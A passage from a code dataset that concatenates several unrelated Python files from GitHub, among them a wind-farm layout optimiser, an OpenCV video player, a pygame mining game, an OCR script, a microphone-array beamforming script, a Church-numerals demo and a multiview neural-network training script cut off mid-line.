angles=np.arange(0,2*np.pi,2*np.pi/N_turbines)\n x_coordinates=np.append(x_coordinates, i*spc*np.cos(angles))\n y_coordinates=np.append(y_coordinates, i*spc*np.sin(angles))\n x_coordinates=np.round(x_coordinates)\n y_coordinates=np.round(y_coordinates)\n layout= (x_coordinates.tolist(), y_coordinates.tolist())\n \n return layout\n\n\ndef SNOPTlayoutoptimization(fi,layout0,wd, ws, freq,optOptions,minimum_D):\n fi.reinitialize(layout=layout0,\n wind_directions=wd,\n wind_speeds=ws)\n layout_opt = LayoutOptimizationPyOptSparse(fi, boundaries, freq=freq,solver=\"SNOPT\",\n optOptions=optOptions,storeHistory=None,min_dist=minimum_D) \n layout_opt.optimize()\n xopt, yopt=layout_opt.get_optimized_locs()\n layout=(xopt,yopt)\n \n layout_opt.plot_layout_opt_results()\n plt.show()\n return layout\n\ndef savelayout(layout,path,filename):\n layoutdf=pd.DataFrame(layout[0],columns=['x'])\n layoutdf['y']=layout[1]\n layoutdf.to_csv(path+filename, index=False)\n\n\n############## Inputs ############## \nmindist = 4\nspc = 6 # maximum spacing at the beginning of the simulation for boundary creation\nshape ='square'\nno_circles_squares =2 \nno_turbines = 25 \nfile_number = f'{mindist}{mindist}{mindist}{no_turbines}{no_turbines}{no_turbines}'\nwindrose = 'iea'\n\nTi = 0.06\n\n############################ \n\npath =fr\"../Results_{windrose}/Results_{mindist}_{spc}\"\nangle=1\n\n\nopt_baseline_file =f'/SNOPTlayoutnew_{shape}_{no_turbines}T_{windrose}.csv'\nsum_print='SNOPTlayoutnew_{shape}_{no_turbines}T_{windrose}.out'\n\n\n# Initialize the FLORIS interface fi\nfi = FlorisInterface('../Inputs/gch15MW.yaml')\nD = fi.floris.farm.rotor_diameters_sorted[0][0][0]\nfi.floris.flow_field.turbulence_intensity=Ti\n\n############## Circle ############## \nif shape=='circle':\n N_circles=no_circles_squares\n spacing=spc*D\n angles=np.arange(0,360+angle,angle)\n boundaries_x=np.round(((N_circles*spacing)+0.01*D)*np.cos(np.radians(angles)))\n boundaries_y=np.round(((N_circles*spacing)+0.01*D)*np.sin(np.radians(angles)))\n boundaries = [[x,y] for x, y in zip(boundaries_x, boundaries_y)]\n # boundaries=sort_boundaries(boundaries)\n layout0=ConcentricCirclesLayout(N_circles,spc,D) \n\n\n############## Square ############## \n## D=240\nif shape=='square':\n N_squares=no_circles_squares\n spc=spc*D\n y_coordinates=np.tile(np.arange(-spc*N_squares,spc*N_squares+spc,spc),1+N_squares*2)\n x_coordinates=np.repeat(np.arange(-spc*N_squares,spc*N_squares+spc,spc),1+N_squares*2)\n x_coordinates=np.round(x_coordinates)\n y_coordinates=np.round(y_coordinates)\n layout0= (x_coordinates.tolist(), y_coordinates.tolist())\n \n boundaries_x=np.round((min(layout0[0])-0.01*D,min(layout0[0])-0.01*D,\n max(layout0[0])+0.01*D,max(layout0[0])+0.01*D,\n min(layout0[0])-0.01*D),decimals=2)\n boundaries_y=np.round((min(layout0[0])-0.01*D,max(layout0[0])+0.01*D,\n max(layout0[0])+0.01*D,min(layout0[0])-0.01*D,\n min(layout0[0])-0.01*D),decimals=2)\n boundaries = [[x,y] for x, y in zip(boundaries_x, boundaries_y)]\n boundaries = pd.DataFrame(boundaries, columns=['x','y'])\n boundaries=boundaries.values.tolist()\n\n\nboundarypolygon = Polygon(boundaries)\nboundaryline = LineString(boundaries)\nboundarycon = np.zeros(len(layout0[0]))\nfor i in range(len(layout0[0])):\n loc = Point(layout0[0][i], layout0[1][i])\n boundarycon[i] = loc.distance(boundaryline)\n if boundarypolygon.contains(loc)==True:\n boundarycon[i] *= -1.0\n \nif not all(boundarycon<0):\n print('not all turbines lie within the boundaries at initialization')\n########################### \n\n############################ iea task ############################\nif windrose =='iea':\n print('############################ iea windrose ############################')\n wd=[0., 22.5, 45., 67.5, 90., 112.5, 135., 157.5, 180., 202.5, 225., 247.5, 270., 292.5, 315., 337.5]\n ws=[10]\n freq_d= [.025, .024, .029, .036,.063, .065, .100, .122,.063, .038, .039, .083, .213, .046, .032, .022]\n ########################################################\nif windrose =='alpha':\n print(' ########################### alpha ventus windrose ############################')\n wd=[0., 22.5, 45., 67.5, 90., 112.5, 135., 157.5, 180., 202.5, 225., 247.5, 270., 292.5, 315., 337.5]\n ws=[10]\n freq_d=[0.0313,0.0402,0.0375, 0.0568,0.0558,0.0608, 0.0424,0.0564,0.0555, 0.1114,0.0932,0.1114, 0.0722,\n 0.0743,0.0500, 0.0508]\n # #######################################################\n \nfreq=np.transpose(np.array([freq_d]))\nfi.reinitialize(layout=layout0,\n wind_directions=wd,\n wind_speeds=ws)\n\nAEP_initial = fi.get_farm_AEP(freq=freq)* 1e-9\nprint(\"=====================================================\")\nprint('AEP_initial='+str(AEP_initial))\nprint(\"=====================================================\")\n\noptOptions={\"Major feasibility tolerance\": 1e-6, \n # \"Verify level\": 3, \n \"Scale option\":0 ,\n # \"Function precision\": 1e-6,\n # \"Major optimality tolerance\": 5e-5,\n \"Major optimality tolerance\": 1e-3,\n # \"Derivative level\":1, \n \"iPrint\": int(file_number)-1,\n \"iSumm\": int(file_number),\n 'Print file':'print_'+sum_print,\n 'Summary file':'sum_'+sum_print,\n # \"Linesearch tolerance\": 0.01\n }\nlayout=SNOPTlayoutoptimization(fi,layout0,wd, ws, freq,optOptions,minimum_D=mindist*D)\nfi.reinitialize(layout=layout)\nAEP_optimized= fi.get_farm_AEP(freq=freq)* 1e-9\nprint(\"=====================================================\")\nprint('AEP_current='+str(AEP_optimized))\nprint(\"=====================================================\")\n\n\nsavelayout(layout, path+ '/BaselineOptimization' , opt_baseline_file)\npdb.set_trace()\n\n\n# 18, 19 square 9 turbines\n# 16, 17 square 25 turbines\n# 14, 15 circle 37 turbines\n# 12, 13 circle 19 turbines\n# 122, 133 circle 19 turbines rounded\n# 1222, 1333 circle 19 turbines rounded FDR\n# 144, 155 circle 37 turbines shapely\n# 1012, 1013 circle 19 turbines np.arange(0,370,10) playing with boarders no shapely","repo_name":"alda30/FloatingWAYS","sub_path":"Layoutoptimization/BaselineOpt.py","file_name":"BaselineOpt.py","file_ext":"py","file_size_in_byte":7460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"85"} +{"seq_id":"3675639735","text":"# importing libraries \nimport cv2 \nimport numpy as np \nimport argparse\n\n# import arguments\nparser = argparse.ArgumentParser(description='Video Player')\nparser.add_argument('--video_file_path', dest='video_file_path', type=str, help='File path of the video')\nparser.add_argument('--fps', dest='fps', type=str, help='Framerate')\nparser.add_argument('--display_resolution_width', dest='display_resolution_width', type=int, help='Width resolution')\nparser.add_argument('--display_resolution_height', dest='display_resolution_height', type=int, help='Height resolution')\nparser.add_argument('--monochrome', dest='monochrome', type=bool, help='Monochrome filter')\nargs = parser.parse_args()\n\n\n\n# press p to pause b to step back a frame\n\nvideo_file_path = args.video_file_path\nfps = args.fps \ndisplay_resolution_width = args.display_resolution_width\ndisplay_resolution_height= args.display_resolution_height\nmonochrome = args.monochrome\n# Use default if arguments have not been provided\nif args.video_file_path is None:\n video_file_path = 'video_1.mp4'\n fps = 30\n monochrome = False\n display_resolution_width = 1280\n display_resolution_height = 720\n# Create a VideoCapture object and read from input file \ncap = cv2.VideoCapture(video_file_path)\ncap.set(cv2.CAP_PROP_FPS, fps) # set frame rate \n\n# retrieve the total number of frames\nframe_count = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\ndef change_res(display_resolution_width,display_resolution_height):\n cap.set(3, display_resolution_width)\n cap.set(4, display_resolution_height)\nchange_res(display_resolution_width,display_resolution_height)\n\ndef rescale_frame(frame, percent=75):\n width = int(frame.shape[1] * percent/ 100)\n height = int(frame.shape[0] * percent/ 100)\n dim = (width, height)\n return cv2.resize(frame, dim, interpolation =cv2.INTER_AREA)\n\n# Check if camera opened successfully \nif (cap.isOpened()== False): \n print(\"Error opening video file\") \n \n# Read until video is completed \nwhile(cap.isOpened()): \n \n # Capture frame-by-frame \n ret, frame = cap.read()\n frame150 = rescale_frame(frame, percent=400)\n grayFrame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n (thresh, blackAndWhiteFrame) = cv2.threshold(grayFrame, 127, 255, cv2.THRESH_BINARY) \n if ret == True:\n # make video monochrome \n if monochrome == True:\n cv2.imshow('video bw', blackAndWhiteFrame)\n else:\n # Display the resulting frame \n cv2.imshow('Frame', frame150) \n key = cv2.waitKey(1) & 0xff\n if key == ord('p'):\n # sleep here until a valid key is pressed\n while (True):\n key = cv2.waitKey(0)\n\n # check if 'p' is pressed and resume playing\n if (key & 0xFF == ord('p')):\n break\n\n # check if 'b' is pressed and rewind video to the previous frame. You must press p to resume playing again.\n if (key & 0xFF == ord('b')):\n cur_frame_number = cap.get(cv2.CAP_PROP_POS_FRAMES)\n print('* At frame #' + str(cur_frame_number))\n\n prev_frame = cur_frame_number\n if (cur_frame_number > 1):\n prev_frame -= 1\n\n print('* Rewind to frame #' + str(prev_frame))\n cap.set(cv2.CAP_PROP_POS_FRAMES, prev_frame)\n\n # Press Q on keyboard to exit \n if cv2.waitKey(25) & 0xFF == ord('q'): \n break\n \n # Break the loop \n else: \n break\n \n# When everything done, release \n# the video capture object \ncap.release() \n \n# Closes all the frames \ncv2.destroyAllWindows() \n\n","repo_name":"tonymao8/ComputerVisionSegmentation","sub_path":"video_playback.py","file_name":"video_playback.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"73679527639","text":"import pygame, sys, math, shop\nfrom manage_map import load_map, save_map\nfrom vars import blocks_type\n\n\nclass ShopButton : \n def __init__(self, text, pos, font, bg=\"black\", feedback=\"\"):\n self.x, self.y = pos\n self.font = pygame.font.SysFont(\"Arial\", font)\n self.surface = self.font.render(text, True, bg)\n self.text = self.font.render(text, 1, pygame.Color(\"White\"))\n self.size = self.text.get_size()\n self.rect = pygame.Rect(self.x, self.y, self.size[0], self.size[1])\n if feedback == \"\":\n self.feedback = \"text\"\n else:\n self.feedback = feedback\n \n def display_shop():\n shop.main()\n \n def show(self):\n screen.blit(self.surface, (self.x, self.y))\n \n def click(self, event):\n x, y = pygame.mouse.get_pos()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if pygame.mouse.get_pressed()[0]:\n if self.rect.collidepoint(x, y):\n shop.main()\n\n\nclass Crosshair(pygame.sprite.Sprite):\n global blocks_sprites, player, block_size\n\n def __init__(self, groups):\n super().__init__(groups)\n self.image = pygame.Surface((1, 1))\n self.image.fill(\"red\")\n self.rect = self.image.get_rect()\n self.rect.center = pygame.mouse.get_pos()\n self.box = pygame.image.load(\"ores/select.png\").convert_alpha()\n\n def update(self, offset_y):\n self.image = pygame.Surface((1, 1))\n self.rect = self.image.get_rect()\n self.rect.center = pygame.mouse.get_pos()\n collisions = pygame.sprite.spritecollide(self, blocks_sprites, False)\n if collisions:\n for block in collisions:\n if math.dist(player.rect.center, block.rect.center) < block_size * 2:\n if not block.mined:\n self.image = self.box\n self.rect = block.rect.copy()\n if pygame.mouse.get_pressed()[0]:\n block.mine()\n\n\nclass BlockType:\n def __init__(\n self,\n name,\n price,\n sturdiness,\n image,\n world_id,\n vein_size,\n rarity,\n height_min,\n height_max,\n ):\n self.name = name\n self.price = price\n self.sturdiness = sturdiness\n self.world_id = world_id\n self.vein_size = vein_size\n self.rarity = rarity\n self.height_min = height_min\n self.height_max = height_max\n self.image = f\"ores/{image}\"\n\n\nclass Block(pygame.sprite.Sprite):\n global screen_width, screen_height, blocks_sprites, player\n\n def __init__(self, pos, blocktype: BlockType, groups):\n super().__init__(groups)\n self.blocktype = blocktype\n self.image = pygame.image.load(blocktype.image).convert_alpha()\n self.rect = self.image.get_rect(topleft=pos)\n self.old_rect = self.rect.copy()\n self.mined = False\n self.mining_progress = 0\n\n def update(self, offset_y):\n self.old_rect = self.rect.copy()\n self.rect.y -= offset_y\n if self.mining_progress >= self.blocktype.sturdiness:\n self.mined = True\n player.add_to_inventory(self.blocktype)\n self.kill()\n elif self.mining_progress > self.blocktype.sturdiness // 2:\n self.image.set_alpha(128)\n\n def mine(self, decrement=1):\n self.mining_progress += decrement\n\n def save(self):\n return [self.blocktype.name, self.rect.topleft, self.mining_progress]\n\n\nclass Player(pygame.sprite.Sprite):\n global screen_width, screen_height, gravity, blocks_sprites\n\n def __init__(self, username, pos, size, groups):\n super().__init__(groups)\n self.username = username\n self.image = pygame.Surface(size)\n self.image.fill(\"red\")\n self.rect = self.image.get_rect(topleft=pos)\n self.old_rect = self.rect.copy()\n self.pos = pygame.math.Vector2(self.rect.center)\n self.direction = pygame.math.Vector2()\n self.speed = 5\n self.on_ground = False\n self.fall_count = 0\n self.pickaxe = None\n self.backpack = None\n self.inventory = {}\n self.balance = 0\n\n def collision(self, direction):\n collision_sprites = pygame.sprite.spritecollide(self, blocks_sprites, False)\n if collision_sprites:\n if direction == \"horizontal\":\n for sprite in collision_sprites:\n # collision on the right\n if (\n self.rect.right >= sprite.rect.left\n and self.old_rect.right <= sprite.old_rect.left\n ):\n self.rect.right = sprite.rect.left\n self.pos.x = self.rect.x\n\n # collision on the left\n if (\n self.rect.left <= sprite.rect.right\n and self.old_rect.left >= sprite.old_rect.right\n ):\n self.rect.left = sprite.rect.right\n self.pos.x = self.rect.x\n\n if direction == \"vertical\":\n for sprite in collision_sprites:\n # collision on the bottom\n if (\n self.rect.bottom >= sprite.rect.top\n and self.old_rect.bottom <= sprite.old_rect.top\n ):\n self.rect.bottom = sprite.rect.top\n self.pos.y = self.rect.y\n self.on_ground = True\n self.fall_count = 0\n self.direction.y = 0\n\n # collision on the top\n if (\n self.rect.top <= sprite.rect.bottom\n and self.old_rect.top >= sprite.old_rect.bottom\n ):\n self.rect.top = sprite.rect.bottom\n self.pos.y = self.rect.y\n self.direction.y *= -1\n\n def window_collision(self, direction):\n if direction == \"horizontal\":\n # collision on the right\n if self.rect.right > screen_width:\n self.rect.right = screen_width\n self.pos.x = self.rect.x\n\n # collision on the left\n if self.rect.left < 0:\n self.rect.left = 0\n self.pos.x = self.rect.x\n\n def move(self):\n keys = pygame.key.get_pressed()\n if keys[pygame.K_i]: # debug inventory\n print(self.inventory)\n\n if keys[pygame.K_q] or keys[pygame.K_LEFT]:\n self.direction.x = -1 * self.speed\n elif keys[pygame.K_d] or keys[pygame.K_RIGHT]:\n self.direction.x = 1 * self.speed\n else:\n self.direction.x = 0\n if (keys[pygame.K_SPACE] or keys[pygame.K_UP]) and self.on_ground:\n self.direction.y = -gravity * self.speed\n self.on_ground = False\n\n def add_to_inventory(self, blocktype: BlockType):\n if blocktype.name not in self.inventory:\n self.inventory[blocktype.name] = 0\n self.inventory[blocktype.name] += 1\n\n def sell_inventory(self):\n for blocktype in self.inventory:\n self.balance += self.inventory[blocktype] * blocktype.price\n self.inventory = {}\n\n def update(self, offset_y):\n self.old_rect = self.rect.copy()\n self.pos.y -= offset_y\n self.direction.y += min(1, (self.fall_count / 60) * gravity)\n if self.fall_count < 60:\n self.fall_count += 1\n self.move()\n self.pos += self.direction\n self.rect.x = round(self.pos.x)\n self.rect.y = round(self.pos.y)\n self.window_collision(\"horizontal\")\n self.collision(\"horizontal\")\n self.window_collision(\"vertical\")\n self.collision(\"vertical\")\n\n def save(self):\n return [self.rect.topleft, self.inventory, self.balance, self.pickaxe, self.backpack]\n\n\nclass Pickaxe:\n def __init__(self, name, mining_speed):\n self.name = name\n self.mining_speed = mining_speed\n\n\nscreen_width = 800\nscreen_height = 600\nblock_size = 32\nplayer_size = (24, 56)\ngravity = 1\nscroll_area = 200\noffset_y = 0\nground_level = screen_height - 10 * block_size\n\n\nall_sprites = pygame.sprite.Group()\nblocks_sprites = pygame.sprite.Group()\n\n\ndef create_block_classes():\n for blocktype in blocks_type:\n block_class = type(blocktype[\"name\"], (BlockType,), {})\n globals()[blocktype[\"name\"]] = block_class(\n blocktype[\"name\"],\n blocktype[\"price\"],\n blocktype[\"sturdiness\"],\n blocktype[\"image\"],\n blocktype[\"world_id\"],\n blocktype[\"vein_size\"],\n blocktype[\"rarity\"],\n blocktype[\"height_min\"],\n blocktype[\"height_max\"],\n )\n\n\ndef create_map(map):\n \"\"\"Create the map from a list of blocks.\"\"\"\n global blocks_sprites, all_sprites\n for block in map:\n if block[0] != \"Air\":\n Block(\n block[1],\n globals()[block[0]],\n [all_sprites, blocks_sprites],\n )\n\n\npygame.init()\npygame.display.set_caption(\"DigDeep\")\nclock = pygame.time.Clock()\nscreen = pygame.display.set_mode((screen_width, screen_height))\nplayer = Player(\"eole\", (screen_width / 2, 0), player_size, all_sprites)\ncrosshair = Crosshair(all_sprites)\ncreate_block_classes()\nmap, saved_player = load_map(player, block_size, screen_width // 32)\ncreate_map(map)\nif saved_player:\n player.inventory = saved_player[1]\n player.balance = saved_player[2]\n player.pickaxe = saved_player[3]\n player.backpack = saved_player[4]\n player.pos = pygame.Vector2(saved_player[0])\nshop_button= ShopButton(\"Shop\", (700, 0), 30, bg=\"white\", feedback=\"text\")\ndef main():\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n save_map(player, blocks_sprites)\n pygame.quit()\n sys.exit()\n shop_button.click(event)\n if player.pos.y > screen_height // 2:\n offset_y = round(player.pos.y - screen_height // 2, 0)\n elif player.pos.y < screen_height // 2 - 50:\n offset_y = -5\n else:\n offset_y = 0\n\n screen.fill(\"black\")\n all_sprites.update(offset_y)\n all_sprites.draw(screen)\n shop_button.show()\n # display output\n pygame.display.update()\n clock.tick(60)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"leo-grandmorcel/B2","sub_path":"Projet_python/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":10598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"35005399923","text":"import easyocr\nreader = easyocr.Reader(['en'])\nresults = reader.readtext(r'C:\\Users\\XRAJ2\\Downloads\\Screenshot_2022-06-18-15-11-59-227_co.gradeup.android.jpg')\n#a.jpg = D:\\Work\\a.jpg\ntext=''\nfor result in results:\n\ttext += result[1] + ' '\nwith open(\"Image2Text.txt\", \"w\") as scones:\n\tcontents = \"\".join(text)\n\tscones.write(contents)","repo_name":"RKY2023/Projects","sub_path":"Photo2Text.py","file_name":"Photo2Text.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"35076738821","text":"import scipy.io\nimport scipy.io.wavfile\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as pat\nfrom Task3_array_transfer_vector import full_array_vector\nimport scipy.fft\nimport scipy.optimize as optimize\n\nfile_names = [\"measurements1\",\"measurements2\",\"measurements3\"]\nsampleRate, audioBuffer = scipy.io.wavfile.read(\"data/\" + file_names[1] + \".wav\")\n\n### TASK 4\n\n# Take one second from the middle of the audio.\naudioBuffer_slice = audioBuffer[5*sampleRate:6*sampleRate]\n# Do FFT for all 16 Elements\nfft_result = np.array([np.fft.rfft(audioBuffer_slice[:,i],8192) for i in range(16)]).T\nprint(audioBuffer_slice[:,0].shape)\n# Calculate Frequencies of the FFT to later calculate the wavelength\nfft_freqs = np.abs(np.fft.rfftfreq(8192)*48000)\n\n# NBDF Algorithm: Beamformer, returns negative absolute for optimization\ndef beamformer(uv,wavelength,R):\n u,v = uv\n a = full_array_vector(u,v,wavelength)\n BF = a.H @ R @ a\n return np.abs(BF)\n\n# Broadband Beamformer: just summing up the BF values for slected Frequency Bins (more bins was to slow)\ndef broadband_beamformer(uv):\n result = 0\n u,v = uv\n for i in range(1,4097,100):\n print(fft_freqs[i])\n # Remove all Frequency values that are not in the selected bin\n Z_freq = np.zeros((4097, 16),np.complex128)\n Z_freq[i,:] = fft_result[i,:]\n # Convert back to time domain\n Z = np.asmatrix(np.array([np.fft.irfft(Z_freq[:,j].T,8192) for j in range(16)]))\n # Calculate Covariance Matrix\n R = (Z @ Z.H) / 48000\n # Use Beamformer to determine power in uv direction and sum up the result for all frequencies\n result = result + beamformer(uv,343/fft_freqs[i],R)\n #result = result + np.abs(full_array_vector(u,v,fft_freqs[i]).H @ fft_result[i,:])**2\n return result\n\n# Plot the Direction Finding Function for all uv values\nif True: \n fig, ax = plt.subplots(1)\n x = np.arange(-1,1,0.1)\n y = np.arange(-1,1,0.1)\n strength = np.zeros((len(x),len(y)),dtype=float)\n for i in range(len(x)):\n for j in range(len(y)):\n strength[i,j] = broadband_beamformer((x[i],y[j]))\n print(i,j)\n\n \n cs = ax.contourf(x,y,strength,cmap='coolwarm')\n\n fig.colorbar(cs)\n plt.savefig('Plots/Broadband_DFF.pdf')\n plt.show()\n\n# TASK 5; The optimization does not work, as there is something wrong with the direction finding function.\n# The algorith terminates at (-1,1) which is outside of the unit circle.\n\n# Convert UV to AZ El Angles\ndef uvtoazel(uv):\n u,v = uv\n return(np.arctan(u/np.sqrt(1-u**2-v**2)),np.arcsin(v))\n# Optimization\nif not True:\n result = optimize.basinhopping(broadband_beamformer,(0.2,-0.1),minimizer_kwargs={'method':'Nelder-Mead', 'bounds':((-0.8,1),(-0.8,1))})\n print (result)\n print('AZ,EL:' + str(np.degrees(uvtoazel(result.x))))\n\n\n \n\n","repo_name":"mj023/array_signal_exercise","sub_path":"Task4_5_direction_finding.py","file_name":"Task4_5_direction_finding.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"6128136875","text":"class Solution:\n def deleteDuplicates(self, head: Optional[ListNode]) -> Optional[ListNode]:\n node=slow=fast=head\n while fast is not None:\n if fast.val != slow.val:\n slow.next = fast\n slow = slow.next\n \n else:\n fast = fast.next\n slow.next=None # 断开与后面重复元素的连接\n return node \n# 像 Java/Python 这类带有垃圾回收的语言,可以帮我们自动找到并回收这些“悬空”的链表节点的内存,而像 C++ 这类语言没有自动垃圾回收的机制,确实需要我们编写代码时手动释放掉这些节点的内存。\n","repo_name":"Emperor19930903/Leetcode","sub_path":"Linked List/Double Pointer/83-删除排序链表中的重复元素.py","file_name":"83-删除排序链表中的重复元素.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"31232239147","text":"# function that takes two arguments and always returns the second argument\nzero = lambda x: lambda y: y\n# apply the x function to y\none = lambda x: lambda y: x(y)\n# apply function x twice\ntwo = lambda x: lambda y: x(x(y))\n\nincrement = lambda x: x + 1 # illegal in terms of lambda calculus, just as a starting point\n\n# if we apply function zero to any function, it will behave as identity function\nidentity = zero(increment) # zero doesn't care about the first arg, it will always return the second arg\n\nincrement_one = one(increment)\n\nincrement_twice = two(increment)\n\nsuccessor = lambda w: (lambda y: lambda x: y(w(y)(x))) # w(y)(x) is the old number\n\n# successor of function zero should be the function one\nnew_one = successor(zero)\nnew_increment_one = new_one(increment_one)\n\n\n# successor of function new_one should be the function two\nnew_two = successor(new_one)\nnew_increment_twice = new_two(increment)\n\n\nthree = successor(new_two)\nincrement_thrice = three(increment)\n\n\nnew_three = successor(successor(successor(zero)))\nnew_increment_thrice = new_three(increment)\n\n\nweird = three(three)\n\n\nLAMBDAS = lambda x: 'λ'+x\n\n\nif __name__ == \"__main__\":\n print(identity(0), identity(1))\n print(increment_one(1), increment_one(4))\n print(increment_twice(3))\n # successor\n print(new_increment_one(100) == increment_one(100))\n print(new_increment_twice(22) == increment_twice(22))\n print(increment_thrice(301))\n print(increment_thrice(200) == new_increment_thrice(200))\n # what could be the result\n print(weird(increment)(0))\n print(three(LAMBDAS)(''))\n ","repo_name":"Davidi24/swe211-paradigms","sub_path":"2021-2022/Functional_Programming/lambda_calculus/numbers.py","file_name":"numbers.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"85"} +{"seq_id":"1825828884","text":"\"\"\"\n\nContributed by Wenbin Li & Jinglin Xu\n\n\"\"\"\n\nfrom __future__ import print_function\nimport argparse\nimport os\nimport random\nimport shutil\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nfrom torch.autograd import grad\nimport time\nfrom torch import autograd\nfrom PIL import ImageFile\n\nfrom dataset.AWADataset import animalAttrData\nimport models.network_MvNNcor as MultiviewNet\n\nImageFile.LOAD_TRUNCATED_IMAGES = True\nos.environ['CUDA_DEVICE_ORDER']='PCI_BUS_ID'\nos.environ['CUDA_VISIBLE_DEVICES']='0'\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--dataset_dir', default='./mvdata/Animals_with_Attributes/Features', help='the path of data')\nparser.add_argument('--data_name', default='AWA', help='The name of the data')\nparser.add_argument('--mode', default='train', help='train|val|test')\nparser.add_argument('--outf', default='./results/MvNNcor')\nparser.add_argument('--net', default='', help='use the saved model')\nparser.add_argument('--basemodel', default='multiviewNet', help='multiviewNet')\nparser.add_argument('--workers', type=int, default=8)\nparser.add_argument('--batchSize', type=int, default=64, help='the mini-batch size of training')\nparser.add_argument('--testSize', type=int, default=64)\nparser.add_argument('--epochs', type=int, default=100, help='the number of epochs')\nparser.add_argument('--num_classes', type=int, default=50, help='the number of classes')\nparser.add_argument('--num_view', type=int, default=6, help='the number of views')\nparser.add_argument('--fea_out', type=int, default=200, help='the dimension of the first linear layer')\nparser.add_argument('--fea_com', type=int, default=300, help='the dimension of the combination layer')\nparser.add_argument('--lr', type=float, default=0.001, help='learning rate, default=0.001')\nparser.add_argument('--beta1', type=float, default=0.5, help='beta1 for adam. default=0.5')\nparser.add_argument('--cuda', action='store_true', help='enables cuda')\nparser.add_argument('--ngpu', type=int, default=1)\nparser.add_argument('--nc', type=int, default=3, help='input image channels')\nparser.add_argument('--clamp_lower', type=float, default=-0.01)\nparser.add_argument('--clamp_upper', type=float, default=0.01)\nparser.add_argument('--print_freq', '-p', default=1, type=int, metavar='N', help='print frequency (default: 10)')\nparser.add_argument('--gamma', type=float, default=6.0, help='the power of the weight for each view')\n\nopt = parser.parse_args()\nopt.cuda = True\ncudnn.benchmark = True\n\nif torch.cuda.is_available() and not opt.cuda:\n print(\"WARNING: You have a CUDA device, so you should probably run with --cuda\")\n\n# save the opt and results to txt file\nopt.outf = opt.outf+'_'+opt.data_name+'_Epochs_'+str(opt.epochs)+'_'+str(opt.gamma)\nif not os.path.exists(opt.outf):\n os.makedirs(opt.outf)\n\ntxt_save_path = os.path.join(opt.outf, 'opt_results.txt')\nF_txt = open(txt_save_path, 'a+')\n\n# ======================================== Folder of Datasets ==========================================\nif opt.data_name == 'AWA':\n\n trainset = animalAttrData(data_dir=opt.dataset_dir, mode=opt.mode)\n valset = animalAttrData(data_dir=opt.dataset_dir, mode='val')\n testset = animalAttrData(data_dir=opt.dataset_dir, mode='test')\n\nprint('Trainset: %d' %len(trainset))\nprint('Valset: %d' %len(valset))\nprint('Testset: %d' %len(testset))\nprint('Trainset: %d' %len(trainset), file=F_txt)\nprint('Valset: %d' %len(valset), file=F_txt)\nprint('Testset: %d' %len(testset), file=F_txt)\n\n# ========================================== Load Datasets ==============================================\ntrain_loader = torch.utils.data.DataLoader(\n trainset, batch_size=opt.batchSize, shuffle=True, \n num_workers=int(opt.workers), drop_last=True, pin_memory=True\n )\nval_loader = torch.utils.data.DataLoader(\n valset, batch_size=opt.testSize, shuffle=True, \n num_workers=int(opt.workers), drop_last=True, pin_memory=True\n ) \ntest_loader = torch.utils.data.DataLoader(\n testset, batch_size=opt.testSize, shuffle=True, \n num_workers=int(opt.workers), drop_last=True, pin_memory=True\n ) \nprint(opt)\nprint(opt, file=F_txt)\n\n# ========================================== Model config ===============================================\ntrain_iter = iter(train_loader)\ntraindata, target = train_iter.next() \nview_list = []\nfor v in range(len(traindata)):\n temp_size = traindata[v].size()\n view_list.append(temp_size[1]) \n\nngpu = int(opt.ngpu)\nmodel = MultiviewNet.define_MultiViewNet(which_model=opt.basemodel, norm='batch', init_type='normal', \n use_gpu=opt.cuda, num_classes=opt.num_classes, num_view=opt.num_view, view_list=view_list,\n fea_out=opt.fea_out, fea_com=opt.fea_com)\n\nif opt.net != '': \n model.load_state_dict(torch.load(opt.net))\n\nif opt.ngpu > 1:\n model = nn.DataParallel(model, range(opt.ngpu))\n\nprint(model) \nprint(model, file=F_txt)\n\n# define loss function (criterion) and optimizer\ncriterion = nn.CrossEntropyLoss().cuda()\noptimizer = optim.Adam(model.parameters(), lr=opt.lr, betas=(opt.beta1, 0.9))\n\n# ======================================= Define functions =============================================\ndef reset_grad():\n model.zero_grad()\n\ndef adjust_learning_rate(optimizer, epoch):\n \"\"\"Sets the learning rate to the initial LR decayed by 10 every 30 epochs\"\"\"\n lr = opt.lr * (0.05 ** (epoch // 30))\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n\ndef train(train_loader, model, weight_var, gamma, criterion, optimizer, epoch, F_txt):\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n\n # switch to train mode\n model.train()\n\n end = time.time()\n\n for index, (sample_set, sample_targets) in enumerate(train_loader):\n \n # measure data loading time\n data_time.update(time.time() - end)\n\n input_var = [sample_set[i].cuda() for i in range(len(sample_set))]\n\n # deal with the target\n target_var = sample_targets.to(\"cuda\")\n\n # compute output\n Output_list = model(input_var) \n\n weight_up_list = []\n loss = torch.zeros(1).to(\"cuda\")\n\n for v in range(len(Output_list)):\n loss_temp = criterion(Output_list[v], target_var)\n loss += 